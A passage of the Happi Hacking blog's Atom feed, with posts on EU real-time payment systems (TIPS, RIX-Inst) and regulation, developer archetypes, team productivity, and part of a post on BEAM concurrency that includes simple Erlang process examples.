&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://x.com/guieevc/status/1002494428748140544&quot;&gt;Erlang powering Internet on Twitter&lt;/a&gt;:&lt;/strong&gt; Cisco telling the world that Erlang controls the Internet.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Feel free to explore these resources to get a deeper understanding of Erlang and how it can be applied to solve complex challenges in the fintech world. Reach out to &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;Happi Hacking&lt;/a&gt; or &lt;a href=&quot;mailto:hello@kindio.se&quot;&gt;Kindio&lt;/a&gt; for more personalized guidance and to discuss how we can support you in building efficient, reliable fintech systems.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>TIPS and RIX-Inst: Navigating the Future of Real-Time Payments in the EU</title>
    <link href="https://happihacking.com/blog/posts/2024/tips/"/>
    <updated>2024-09-03T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/tips/</id>
    <summary>Opportunities and Challenges for Fintech Companies</summary>
    <content type="html">&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/castle.jpg&quot; alt=&quot;The Crypto Castle, photo E. Stenman&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;The Crypto Castle, photo E. Stenman&quot; /&gt; &lt;/div&gt;
&lt;p&gt;In Europe, the way people pay for things is changing.
Real-time payment systems that allow instant transfers are becoming the standard.
Sweden is leading this transformation with Swish,
a popular mobile payment platform that has revolutionized everyday transactions
by offering instant, secure payments between individuals and businesses.
Systems like TIPS (TARGET Instant Payment Settlement) and RIX-Inst in Sweden
are further driving the shift towards real-time payments across the continent.&lt;/p&gt;
&lt;p&gt;The European Union is introducing new directives that impact how fintech companies
must operate within this environment.
In this post, we will give an overview of what TIPS and RIX-Inst mean for the future of real-time payments,
the technical and operational requirements for integrating these systems,
and how to navigate the latest EU directives to ensure compliance and competitiveness.&lt;/p&gt;
&lt;h2 id=&quot;understanding-tips-and-rix-inst&quot; tabindex=&quot;-1&quot;&gt;Understanding TIPS and RIX-Inst&lt;/h2&gt;
&lt;p&gt;TIPS and RIX-Inst are instant payment systems that enable real-time,
round-the-clock fund transfers between European banks and financial institutions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;TIPS (TARGET Instant Payment Settlement):&lt;/strong&gt;
Launched by the European Central Bank (ECB) in 2018, TIPS is part of the TARGET services. It allows payment service providers to transfer funds across Europe in seconds, 24/7, regardless of the time, day, or public holidays. TIPS ensures immediate settlement of payments directly in central bank money, which minimizes counterparty risk and enhances security and trust in the payment process.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;RIX-Inst:&lt;/strong&gt;
Operated by the Swedish central bank, Sveriges Riksbank, RIX-Inst is the Swedish equivalent of TIPS. It provides instant settlement for payments in Swedish kronor (SEK). It aims to meet the growing demand for immediate payments in Sweden, where consumers and businesses expect their financial transactions to be processed instantly and securely.&lt;/p&gt;
&lt;p&gt;TIPS and RIX-Inst are critical components of the EU&#39;s vision for a Single Euro Payments Area (SEPA), where cross-border payments within the Eurozone are as simple, fast, and cost-effective as domestic payments.&lt;/p&gt;
&lt;h2 id=&quot;key-features-and-benefits&quot; tabindex=&quot;-1&quot;&gt;Key Features and Benefits&lt;/h2&gt;
&lt;p&gt;Real-time payment systems like TIPS and RIX-Inst facilitate immediate funds transfers, reducing settlement risk and enhancing liquidity for financial institutions. They offer 24/7 availability, allowing transactions any day or night, which provides convenience and flexibility to customers and businesses.
TIPS also allows for cross-border transactions across the Eurozone,
while RIX-Inst focuses on the Swedish market with potential future integration possibilities.
Settling payments in central bank money eliminates counterparty risk, ensuring greater security and trust.&lt;/p&gt;
&lt;h2 id=&quot;technical-and-operational-requirements-for-integration&quot; tabindex=&quot;-1&quot;&gt;Technical and Operational Requirements for Integration&lt;/h2&gt;
&lt;p&gt;Integrating with TIPS or RIX-Inst requires a solid understanding of both the technical and operational landscapes.
Payment service providers must implement and maintain APIs that meet the requirements set by the ECB for TIPS or the Riksbank for RIX-Inst, ensuring compatibility with ISO 20022 messaging standards, the global standard for financial messages.
The systems must handle large volumes of data and transactions quickly without compromising accuracy or security.&lt;/p&gt;
&lt;p&gt;Ensuring security is crucial for instant payment systems. Institutions must implement robust encryption, multi-factor authentication, and secure coding practices to protect against fraud and data breaches. Compliance with local and international regulations, such as PSD2 (Payment Services Directive 2), requires secure communication channels and strong customer authentication (SCA).&lt;/p&gt;
&lt;p&gt;The underlying IT infrastructure must support high availability, low latency, and scalability to handle peak transaction loads. I plan to write more about this in a future blog post.&lt;/p&gt;
&lt;h2 id=&quot;regulatory-compliance-and-adherence-to-new-eu-directives&quot; tabindex=&quot;-1&quot;&gt;Regulatory Compliance and Adherence to New EU Directives&lt;/h2&gt;
&lt;p&gt;The European Union has introduced several new directives that impact real-time payment systems like TIPS and RIX-Inst. Key among these are the revised Payment Services Directive (PSD2), the upcoming Digital Operational Resilience Act (DORA), the Markets in Crypto-Assets Regulation (MiCA), and the Instant Payments Regulation (IPR).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PSD2 (Revised Payment Services Directive):&lt;/strong&gt; PSD2 has fundamentally reshaped the payment services industry by promoting competition, innovation, and transparency. It mandates open banking, where banks must share customer data with third-party providers (with customer consent) via APIs. For fintech companies, this means ensuring compliance with PSD2 requirements, particularly in secure communication, strong customer authentication, and transparency.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;DORA (Digital Operational Resilience Act):&lt;/strong&gt; Expected to be fully in force by 2025, DORA aims to bolster financial institutions&#39; operational resilience against digital risks. It requires firms to ensure that their ICT systems can withstand, respond to, and recover from all ICT-related disruptions and threats. For companies integrating with TIPS or RIX-Inst, DORA compliance will involve strengthening cybersecurity measures, implementing robust risk management frameworks, and undergoing regular digital resilience testing.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MiCA (Markets in Crypto-Assets Regulation):&lt;/strong&gt; MiCA provides a regulatory framework for digital assets, including cryptocurrencies, across the EU. While not directly related to TIPS and RIX-Inst, MiCA could impact fintech firms exploring blockchain or cryptocurrency integrations with instant payment systems. Companies must understand how MiCA’s provisions may affect their digital asset strategies and ensure compliance where relevant.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;IPR (Instant Payments Regulation):&lt;/strong&gt; The Instant Payments Regulation (IPR) aims to make instant payments in euro universally available across the European Union. It builds on the existing Single Euro Payments Area (SEPA) Regulation to ensure that all payment service providers offer instant payment services in euro, making it mandatory for these services to be accessible, affordable, and secure. IPR requires that the cost of an instant payment must not exceed that of a regular credit transfer, and it mandates that providers verify their customers against EU sanctions lists at least daily. For fintech companies, aligning with IPR means ensuring their systems can process instant payments in compliance with these new rules, potentially expanding their market reach while maintaining competitive pricing and robust security standards.&lt;/p&gt;
&lt;h2 id=&quot;implementing-the-new-eu-directives&quot; tabindex=&quot;-1&quot;&gt;Implementing the New EU Directives&lt;/h2&gt;
&lt;p&gt;Fintech companies should stay updated on regulatory changes by regularly monitoring updates from the European Central Bank, the European Banking Authority, and other relevant regulatory bodies. Developing flexible compliance frameworks that can quickly adapt to new regulations is crucial, and leveraging technologies like AI and machine learning to monitor transactions, automate compliance checks, and enhance fraud detection capabilities will help.&lt;/p&gt;
&lt;h1 id=&quot;opportunities-for-fintech-companies&quot; tabindex=&quot;-1&quot;&gt;Opportunities for Fintech Companies&lt;/h1&gt;
&lt;p&gt;Integrating with real-time payment systems offers several opportunities for fintech companies to enhance their market position and drive growth. One key advantage is the ability to provide an improved customer experience by offering immediate fund transfers with unparalleled speed and convenience. As consumers increasingly expect instant transactions, fintech companies that adopt these systems can differentiate themselves with faster, more efficient payment services, boosting customer satisfaction and loyalty. Additionally, integrating with TIPS facilitates seamless cross-border transactions within the Eurozone, enabling companies to expand their service offerings to a broader audience without costly infrastructure adjustments. This ability to reach new markets supports international growth strategies and attracts new customers, strengthening a company’s competitive edge.&lt;/p&gt;
&lt;p&gt;Moreover, by adopting TIPS and RIX-Inst, fintech companies can reduce operational costs and risks. Settling payments in central bank money minimizes counterparty risk, lowering the need for expensive risk management processes and freeing up capital for innovation and growth. Real-time settlements also improve cash flow management and provide better company and customer liquidity. Aligning with EU directives such as PSD2, DORA, and MiCA further enhances a company&#39;s secure, reliable, and future-ready reputation, building trust with customers, partners, and regulators. Proactive compliance avoids legal penalties and creates opportunities for new products and services that cater to the growing demand for instant payments, such as premium real-time payment options or innovative mobile solutions. This way, fintech companies can secure new revenue streams, strengthen fraud prevention and security, and leverage advanced technologies like AI and blockchain to stay at the forefront of innovation.&lt;/p&gt;
&lt;h1 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h1&gt;
&lt;p&gt;Adopting real-time payment systems such as TIPS and RIX-Inst marks a significant shift for the European fintech sector, offering new opportunities for innovation, efficiency, and growth. However, integrating these systems comes with challenges, particularly regarding new EU directives like IPR, PSD2, DORA, and MiCA.
Fintech companies that proactively adopt these systems and align with regulations are better positioned to capitalize on growth opportunities and stay ahead of the competition.
If your organization is ready to integrate with TIPS and RIX-Inst but needs expert guidance, contact &lt;a href=&quot;https://kindio.se/&quot;&gt;Kindio&lt;/a&gt;. Their team can help you seamlessly implement these real-time payment systems, support your transition to instant payments, and ensure compliance with the latest EU regulations.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Developer Types</title>
    <link href="https://happihacking.com/blog/posts/2024/the_elephant/"/>
    <updated>2024-05-15T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/the_elephant/</id>
    <summary>Addressing the Elephant in the Room</summary>
    <content type="html">&lt;img class=&quot;img-blog &quot; src=&quot;https://happihacking.com/images/animal_developers.png&quot; alt=&quot;A creative office scene showing three developers represented as animals, each facing their computer screens.&quot; title=&quot;A creative office scene showing three developers represented as animals, each facing their computer screens.&quot; /&gt;
&lt;div class=&quot;txt-centered&quot;&gt;The prototyping Monkey is a bit sceptical because he got two managers instead of developers to take over his product...&lt;/div&gt;
&lt;p&gt;In a &lt;a href=&quot;https://happihacking.com/blog/posts/2024/team_performace/&quot;&gt;recent blog post&lt;/a&gt; I explored team performance in software development. Following this, I received a question on LinkedIn about strategies to enhance team cohesion and motivation. My response highlighted an analogy by Mike Williams that categorizes programmers as Monkeys, Tigers, and Elephants.
This analogy, drawn from his presentation &lt;a href=&quot;https://www.youtube.com/watch?v=YULFQw686JY&quot;&gt;How Not to Run a Software Project&lt;/a&gt;, is valuable for understanding software development team dynamics.&lt;/p&gt;
&lt;p&gt;In this post, I will expand upon this analogy and explore how recognizing these programmer types can significantly improve team effectiveness and project management. In his talk, Mike Williams emphasizes that developers who specialize in prototyping, making, and maintaining products have distinct skills and mindsets.&lt;/p&gt;
&lt;p&gt;In the initial stage, when you start from a blank slate, you require developers adept at navigating uncertainty and swiftly adapting to changing needs. Like &#39;Monkeys&#39; in Mike&#39;s analogy, these developers are innovators at heart. They excel in environments that demand creativity and the ability to change and adapt.&lt;/p&gt;
&lt;p&gt;As the project moves from prototype to production, the role shifts to developers who mirror the characteristics of &#39;Tigers.&#39; This phase needs individuals who can focus intensely and drive the project forward with precision. These developers refine the initial prototypes into fully functional products, ensuring that every aspect is optimized and scalable for market readiness.&lt;/p&gt;
&lt;p&gt;Once the product is launched, the focus turns to maintenance, a task suited to consistent and reliable developers, like &#39;Elephants.&#39; These developers are crucial for a product&#39;s long-term success as they manage updates, fix bugs, and make iterative improvements based on user feedback. Their thorough understanding of the product and its underlying architecture enables them to enhance its stability and functionality over time.&lt;/p&gt;
&lt;h2 id=&quot;prototyping-a-product-and-the-monkey-developer&quot; tabindex=&quot;-1&quot;&gt;Prototyping a Product and the Monkey Developer&lt;/h2&gt;
&lt;h3 id=&quot;phase-description&quot; tabindex=&quot;-1&quot;&gt;Phase Description&lt;/h3&gt;
&lt;p&gt;Prototyping a product is the early stage of software development, in which the focus is on turning concepts into software. This phase is marked by a high degree of inventiveness and agility. Developers in this stage are expected to embrace uncertainty and experiment with new ideas and approaches. The nature of this work demands frequent iterations and a willingness to discard or reshape ideas as they evolve. This phase often produces incomplete solutions that are not ready for production. Developers here are comfortable working with prototypes that only cover some functionalities and only handle very specific cases. The key is to develop enough to test theories and gain valuable insights without expecting perfection.&lt;/p&gt;
&lt;h3 id=&quot;team-composition-and-qualities&quot; tabindex=&quot;-1&quot;&gt;Team Composition and Qualities&lt;/h3&gt;
&lt;p&gt;The team typically comprises a small group (fewer than 8 members) of highly autonomous and egocentric individualists. These members are often good developers with extensive technological knowledge. They are pioneers who thrive on challenges and are continuously pushing the boundaries of what&#39;s technologically feasible. Their work is driven by a passion for innovation and a desire to explore new territories without the constraints of fully finalized solutions.&lt;/p&gt;
&lt;h3 id=&quot;animal-metaphor-monkey&quot; tabindex=&quot;-1&quot;&gt;Animal Metaphor - Monkey&lt;/h3&gt;
&lt;p&gt;The Monkey metaphor encapsulates the spirit of the prototyping phase. Monkeys are playful, agile, and intelligent, characteristics that are crucial for developers during this early and fluid stage of product development. Known for their quick adaptability and innovative problem-solving skills, monkeys aptly represent developers who are adept at navigating the often chaotic and unpredictable challenges of creating new technologies. Their ability to swiftly adapt and pivot as needed aligns well with the demands of prototyping, where flexibility and rapid iteration are more critical than perfection and completeness.
They are also a bit careless and don’t worry too much about whether things work out.&lt;/p&gt;
&lt;h3 id=&quot;a-real-life-monkey&quot; tabindex=&quot;-1&quot;&gt;A Real-Life Monkey&lt;/h3&gt;
&lt;p&gt;I am a Monkey developer. I can quickly jump from a crazy idea to code. I usually have a proof of concept working in a few hours or days.
Well, when I say working, some code works for the happy path, and if the moon is in the right place, you can demo it to people, and it looks ok. But don&#39;t let anyone else use the product because things will fall apart if you do anything outside the demo specification. And don&#39;t let anyone look at the code because it has been thrown together as a series of experiments where the concepts have shifted while I have discovered the problem domain. The naming is inconsistent at best, and only the most obvious cases are handled.&lt;/p&gt;
&lt;div class=&quot;txt-centered&quot;&gt;
  &lt;img class=&quot;img-blog &quot; src=&quot;https://happihacking.com/images/happi_monkey.jpg&quot; alt=&quot;Me as a Happy monkey.&quot; style=&quot;width: 50%; object-fit: contain;&quot; title=&quot;Me as a Happy monkey.&quot; /&gt;
  &lt;br /&gt;
  Monkey me.
&lt;/div&gt;
&lt;h2 id=&quot;making-a-product-and-the-tiger-developer&quot; tabindex=&quot;-1&quot;&gt;Making a Product and the Tiger Developer&lt;/h2&gt;
&lt;h3 id=&quot;phase-description-1&quot; tabindex=&quot;-1&quot;&gt;Phase Description&lt;/h3&gt;
&lt;p&gt;The Making a Product phase shifts from conceptual prototyping to focused development, aiming to transform early prototypes into reliable, scalable, and production-ready software. This stage requires high precision as developers refine and optimize their initial ideas into a cohesive product that meets specific market and functional requirements. It is characterized by structured development, stringent testing, and a systematic approach to ensure that all elements of the software function seamlessly together. The goal is to solidify the architecture, enhance features, and prepare the product for deployment, adhering to industry standards and user expectations.&lt;/p&gt;
&lt;h3 id=&quot;team-composition-and-qualities-1&quot; tabindex=&quot;-1&quot;&gt;Team Composition and Qualities&lt;/h3&gt;
&lt;p&gt;This phase typically involves larger teams than the prototyping stage but still operates under the guidance of focused, driven individuals who excel in project management and detail-oriented tasks. The team members, often resembling Tigers in their work style, are known for their tenacity and ability to drive projects to completion. They focus on achieving goals and are adept at navigating the complexities of turning a rough concept into a polished product. These developers are critical thinkers who can execute precise adjustments and optimizations to enhance product performance and reliability.&lt;/p&gt;
&lt;h3 id=&quot;animal-metaphor-tiger&quot; tabindex=&quot;-1&quot;&gt;Animal Metaphor - Tiger&lt;/h3&gt;
&lt;p&gt;The Tiger metaphor is apt for developers in the Making a Product phase due to the tiger&#39;s focus, strength, and determination attributes. Just as a tiger hunts with precision and does not waver from its target, Tiger developers focus on their objectives, tackling each task with intensity and a clear vision of the end goal. Their strategic approach and powerful presence are essential in ensuring the project progresses steadily toward completion, mirroring the tiger&#39;s role in maintaining control and leading the pack through the development jungle. This phase demands resilience and a commanding grasp of software development&#39;s technical and managerial aspects, qualities that Tiger developers embody perfectly.&lt;/p&gt;
&lt;h3 id=&quot;a-real-life-tiger&quot; tabindex=&quot;-1&quot;&gt;A Real-Life Tiger&lt;/h3&gt;
&lt;p&gt;My good friend and frequent co-worker Tobias Lindahl is an excellent example of a Tiger programmer. When we work together on a project, he picks up where I left off, grumbling about shoveling through my s**t. He dots the i&#39;s and crosses the t&#39;s, handling all the errors and non-trivial cases I skipped. Tobias has the patience to think through all possible problems and solutions, and then he transforms my mockup or proof of concept into a genuine product.&lt;/p&gt;
&lt;p&gt;He cannot stand broken or unfinished things. He likes to fix things at home, in the office, and in code. He wears cargo pants and brings a screwdriver with him everywhere.&lt;/p&gt;
&lt;h2 id=&quot;maintaining-a-product-and-the-elephant-developer&quot; tabindex=&quot;-1&quot;&gt;Maintaining a Product and the Elephant Developer&lt;/h2&gt;
&lt;h3 id=&quot;phase-description-2&quot; tabindex=&quot;-1&quot;&gt;Phase Description&lt;/h3&gt;
&lt;p&gt;The Maintaining a Product phase focuses on the long-term sustainability and evolution of the software after its launch. This stage involves continuous monitoring, updating, and enhancing the product to ensure it remains relevant, functional, and competitive. Developers in this phase are tasked with addressing bugs, implementing enhancements based on user feedback, and adapting the product to new technologies or market conditions. This phase is crucial for ensuring the software&#39;s stability and extending its life cycle through careful, incremental improvements and meticulous attention to detail.&lt;/p&gt;
&lt;h3 id=&quot;team-composition-and-qualities-2&quot; tabindex=&quot;-1&quot;&gt;Team Composition and Qualities&lt;/h3&gt;
&lt;p&gt;The team in this phase generally consists of dedicated, experienced developers capable of deep focus and a thorough understanding of the product’s history and underlying architecture. Often referred to as Elephant developers, these individuals are known for their reliability, methodical approach, and memory for detail. They are adept at managing complex systems and can navigate large codebases to diagnose and fix issues effectively. Their work ensures the product’s performance is consistently optimized and adapts over time to meet evolving user needs.&lt;/p&gt;
&lt;h3 id=&quot;animal-metaphor-elephant&quot; tabindex=&quot;-1&quot;&gt;Animal Metaphor - Elephant&lt;/h3&gt;
&lt;p&gt;The Elephant metaphor captures the essence of developers in the Maintaining a Product phase. Elephants are renowned for their intelligence, memory, and stability, qualities indispensable for maintaining complex software systems. Like elephants, these developers are calm, patient, and capable of handling large-scale tasks that require a long-term commitment and a detailed understanding of past interactions within the system. Their role is less about rapid innovation and more about consistency, reliability, and gradual enhancement. They bring wisdom and foresight to the development team, making strategic decisions that impact the product’s future viability and success.&lt;/p&gt;
&lt;h3 id=&quot;a-real-life-elephant&quot; tabindex=&quot;-1&quot;&gt;A Real-Life Elephant&lt;/h3&gt;
&lt;p&gt;My friend and colleague Richard Carlsson embodies the mindset and abilities of an Elephant developer, excelling in software development&#39;s maintenance and enhancement phase. Maintainers like Richard possess meticulous attention to detail and a deep understanding of the systems they work with. He often invests significant time in comprehending a system thoroughly before implementing any changes. Then, once he knows what he is doing, he is known for being willing to modify every file in an entire system to ensure proper naming conventions and improve code clarity.&lt;/p&gt;
&lt;p&gt;His ability to delve deeply into a codebase&#39;s intricacies allows him to make informed and thoughtful changes, minimizing the risk of introducing new issues while resolving existing ones. Elephant developers like Richard prioritize stability, reliability, and efficiency. They have a keen eye for detail and a strong sense of responsibility towards the systems they manage. They focus on ensuring that software continues to meet user needs and adapts to evolving requirements while maintaining a high standard of code quality. Because of the time invested in understanding a system and domain, replacing a good maintainer is hard and expensive.&lt;/p&gt;
&lt;img class=&quot;img-blog &quot; src=&quot;https://happihacking.com/images/animal_developers_proper_clothes.png&quot; alt=&quot;A creative office scene showing three developers represented as animals, with t-shirts and cargo pants.&quot; title=&quot;A creative office scene showing three developers represented as animals, with t-shirts and cargo pants.&quot; /&gt;
&lt;div class=&quot;txt-centered&quot;&gt;Now we have a proper team...&lt;/div&gt;
</content>
  </entry>
  
  <entry>
    <title>The Quest for Enhanced Productivity in Software Development</title>
    <link href="https://happihacking.com/blog/posts/2024/team_performace/"/>
    <updated>2024-04-28T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/team_performace/</id>
    <summary>A Reflection One and a Half Decades Later</summary>
    <content type="html">&lt;img class=&quot;img-blog &quot; src=&quot;https://happihacking.com/images/Happi_talks3.jpg&quot; alt=&quot;Happi with a whiteboard in the background.&quot; title=&quot;Happi with a whiteboard in the background.&quot; /&gt;
&lt;p&gt;In late 2009, Sebastian Siemiatkowski, the CEO of Klarna, and I embarked on a series of enlightening discussions with leading technology companies in Stockholm, including Google, Tail-f, Pricerunner, Dice, Avanza, Ericsson, Bwin, and Virtutech. Our aim was to understand how successful companies cultivate their teams, enhance productivity, and manage their processes by understanding their corporate culture, strategies, and management practices.&lt;/p&gt;
&lt;p&gt;Our conversations revealed a universal problem within the industry: defining and measuring productivity. From Google to Ericsson, every company seemed to grapple with similar questions: How do we measure productivity effectively? How do we set meaningful goals? What best motivates our developers? And crucially, how do we attract and retain top talent?
The challenge of measuring productivity proved to be the most formidable. Mike Williams from Ericsson suggested that productivity isn&#39;t always quantifiable in objective terms; instead, it demands a managerial perspective that’s partly subjective. Ericsson, for instance, tracks metrics like hours spent per bug as a measure of quality. On the other hand, Google employs a peer review system where developers are assessed by their teammates, underscored by a dual reward system that motivates individual and team performance.&lt;/p&gt;
&lt;p&gt;Setting goals was another area where commonality was found. Successful organizations like Google have a top-down yet participatory approach to goal setting. Managers provide strategic direction, such as improving response times for a specific product, and teams are encouraged to propose specific, measurable targets. These goals are then fine-tuned through a collaborative dialogue between managers and teams, ensuring the targets are ambitious yet achievable, with clear rewards tied to their accomplishment.&lt;/p&gt;
&lt;p&gt;When it comes to motivation, we discovered that while monetary bonuses are prevalent, intrinsic motivators such as career progression opportunities and a vibrant, creative work environment also play significant roles. Companies that manage to create an engaging and supportive workplace culture boost motivation and enhance overall job satisfaction among developers.
Finally, recruiting and retaining top talent seems to hinge on the attractiveness of the company culture. High-performing developers tend to attract peers of similar caliber. Our discussions highlighted the importance of a meticulous recruitment process, where technical challenges and team interviews play a crucial role in ensuring cultural and technical fit.&lt;/p&gt;
&lt;p&gt;These dialogues revealed an essential truth in software development: the right mix of people simplifies many operational challenges. By focusing on creating a supportive culture, encouraging open dialogue about goals, and recognizing both team and individual achievements, companies can enhance productivity and foster innovation and satisfaction among their teams.
I was reminded of this interview tour by
&lt;a href=&quot;https://www.inc.com/magazine/202404/ali-donaldson/how-klarnas-co-founder-learned-to-hire-tech-talent-without-a-tech-background.html&quot;&gt;an article in Inc Magazine&lt;/a&gt;
through a
&lt;a href=&quot;https://www.linkedin.com/posts/klarna_how-klarnas-co-founder-learned-to-hire-tech-activity-7186750554616799232-pru-?utm_source=share&quot;&gt;LinkedIn post&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Now, 15 years after those initial insightful discussions, my role as a consultant has afforded me a wider view of the software development landscape across various types and sizes of companies. Despite the passage of time and the advent of new technologies, the core challenges remain remarkably consistent.
The difficulties are universal, from small startups endeavoring to realize ambitious ideas to large corporations with thousands of developers. These large organizations often implement frameworks like SAFe or other methodologies to instill order and coherence across teams of teams. Yet, they continue to confront the same fundamental questions about productivity, motivation, goal-setting, and recruitment.&lt;/p&gt;
&lt;p&gt;A recurring theme in my observations is the central importance of the team. I later expanded on this in &lt;a href=&quot;https://happihacking.com/blog/posts/2024/the_elephant/&quot;&gt;Developer Types&lt;/a&gt;, where I discuss how different programmer archetypes (Monkeys, Tigers, Elephants) affect team composition. The dynamics within these groups, their collaborative efficiency, and their collective skill set are often the linchpins of project success or failure. A well-aligned team can navigate complex challenges and drive projects to success, reinforcing that the collective is often greater than the sum of its parts.&lt;/p&gt;
&lt;p&gt;The quality of leadership is perhaps even more important than any other factor in an organization. Leaders who possess a clear vision and the bravery to pursue it are essential in guiding their teams through challenging situations. The ability to set clear goals, motivate teams, and make timely decisions is the key to success, as long as leaders have the courage to act.
As I continue to engage with different companies, it becomes increasingly clear that while the tools and technologies evolve, the human elements of team dynamics and leadership remain key determinants of success in software development. To thrive in this field, an organisation needs to address these age-old challenges with innovative approaches and steadfast leadership.
One of the most valuable things that can be learned from Sebastian is the importance of proactively seeking out and building relationships with experts in a particular field. By gaining insights and knowledge from those who have already excelled, we can accelerate our own progress and success. Don&#39;t hesitate to tap into the vast resources available and learn from the best.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Designing Concurrent Systems on the BEAM</title>
    <link href="https://happihacking.com/blog/posts/2024/designing_concurrency/"/>
    <updated>2024-03-09T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/designing_concurrency/</id>
    <summary>Principles and Strategies for Robust System Design</summary>
    <content type="html">&lt;h1 id=&quot;designing-concurrent-systems-on-the-beam&quot; tabindex=&quot;-1&quot;&gt;Designing Concurrent systems on the BEAM&lt;/h1&gt;
&lt;img class=&quot;img-blog center&quot; src=&quot;https://happihacking.com/images/sunrise.jpeg&quot; alt=&quot;&#39;Simplicity is the ultimate sophistication.&#39; - Leonardo da Vinci&quot; title=&quot;&#39;Simplicity is the ultimate sophistication.&#39; - Leonardo da Vinci&quot; /&gt;
&lt;h2 id=&quot;introduction&quot; tabindex=&quot;-1&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Concurrency is a necessity when developing larger software systems. It reflects our world&#39;s inherent complexity, where multiple events occur simultaneously, demanding systems that can multitask efficiently.&lt;/p&gt;
&lt;p&gt;The BEAM&#39;s concurrency model, grounded in the actor model, prioritizes lightweight processes. These processes operate in isolation, without shared memory, communicating solely through message passing. This architecture minimizes the risk of system-wide failures due to process errors. The BEAM&#39;s preemptive scheduling also ensures fair process execution time, preventing any single process from dominating the system. This model makes it far easier to build efficient, reliable, scalable, and maintainable systems.&lt;/p&gt;
&lt;p&gt;Understanding BEAM&#39;s approach to concurrency allows developers to take advantage of these features in the best possible way. In this post, I will not go into the details of how the BEAM works; I have written a whole book on the subject: &lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;. Instead, I will focus on how to think about processes and concurrency when designing concurrent systems. I will recap the most important aspects of the BEAM’s concurrency model so that we understand what we are building on.&lt;/p&gt;
&lt;h2 id=&quot;beams-concurrency-model&quot; tabindex=&quot;-1&quot;&gt;BEAM’s Concurrency Model&lt;/h2&gt;
&lt;p&gt;BEAM&#39;s concurrency model uses the actor model. This model has the following defining characteristics: lightweight processes, process isolation, signals (including message passing), and scheduling.&lt;/p&gt;
&lt;p&gt;BEAM handles concurrency through lightweight processes managed by the BEAM VM rather than the underlying operating system. These extremely lightweight processes allow thousands or even millions of concurrent processes without significant overhead.
Each process in the BEAM runs in complete isolation from others, with no shared memory. Isolation ensures that failure in one process does not directly impact another, enhancing fault tolerance and system reliability.&lt;/p&gt;
&lt;p&gt;Communication between processes in the BEAM is achieved exclusively through signals. This mechanism ensures the decoupling of processes, as they do not share state directly. The most used signal is the message signal, which allows one process to send a message to another asynchronously.
The BEAM uses preemptive scheduling that allocates execution time to processes. Preemptive scheduling prevents any single process from monopolizing the system and ensures that all processes are serviced appropriately.&lt;/p&gt;
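A minimal sketch of these primitives in Erlang - spawn/1, the ! send operator, and selective receive - where the module name and message shapes are illustrative:

```erlang
-module(echo).
-export([start/0, loop/0]).

%% Spawn an isolated process and exchange one message with it.
start() ->
    Pid = spawn(fun loop/0),      % lightweight process with its own heap
    Pid ! {self(), hello},        % asynchronous message signal
    receive
        {Pid, Reply} -> Reply     % selective receive from our mailbox
    end.

%% The spawned process waits for a message and answers the sender.
loop() ->
    receive
        {From, Msg} ->
            From ! {self(), {echoed, Msg}},
            loop()
    end.
```

Because the send is asynchronous, start/0 continues immediately after the ! and only blocks when it deliberately waits in receive.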
&lt;p&gt;These features and the built-in constructs for error handling make it easy to build fault-tolerant and resilient systems, for example, through supervisors and supervision trees.&lt;/p&gt;
&lt;p&gt;The lack of true process isolation in most programming languages and environments is the root cause of the rising popularity of microservices.&lt;/p&gt;
&lt;h2 id=&quot;processes-code&quot; tabindex=&quot;-1&quot;&gt;Processes ≠ Code&lt;/h2&gt;
&lt;p&gt;A common misconception in designing systems with BEAM is equating processes with modules, gen_servers, or the specific code that is spawned. This view muddles the understanding of the architecture and misses the depth of BEAM&#39;s concurrency model. Let&#39;s dissect this notion with a clear, logical approach to appreciate the distinction between processes and the code they execute.&lt;/p&gt;
&lt;p&gt;A process in the BEAM environment is an independent entity capable of executing code. However, it&#39;s crucial to understand that the process is not the code. The process is the executor that brings code to life. A process can run any code assigned to it, whether it&#39;s a simple function or a complex gen_server. This versatility means that processes are not inherently tied to the nature or purpose of the code they execute.
Understanding that processes are separate from the code they execute has significant implications for system design. Since processes are independent executors, they isolate code execution, preventing failures in one process from directly affecting others. It becomes easier to manage concurrency as each process is a distinct execution unit. Developers can spawn, monitor, and control processes dynamically, adapting to the system&#39;s concurrent demands without being bogged down by the specifics of the code within each process.&lt;/p&gt;
&lt;p&gt;A developer needs to understand that the code in a module can be executed by any process. Even if a module has a start function that spawns a process to execute, for example, a server loop in the module, it does not mean that the module is that server. The spawning is done by some other process, so the server process never executes the start function. On the other hand, the server loop will probably call functions in other modules, so the server process is not limited to executing the code in its own module either.
Now that we have clearly distinguished between code and processes and realized that the code is not the process, how should we think about processes?&lt;/p&gt;
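The distinction can be made concrete in a few lines. In this illustrative module, start/0 runs in the calling process; only the newly spawned process ever executes loop/1, and the state lives in that process, not in the module:

```erlang
-module(counter).
-export([start/0, loop/1]).

%% start/0 executes in the CALLER's process; the spawned
%% process is the one that runs loop/1.
start() ->
    spawn(?MODULE, loop, [0]).

%% The server loop: the process, not the module, holds the count.
loop(Count) ->
    receive
        increment ->
            loop(Count + 1);
        {From, get} ->
            From ! {self(), Count},
            loop(Count)
    end.
```

Spawning counter:start() twice gives two independent counters running the same code, which is exactly the point: the code is shared, the processes and their state are not.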
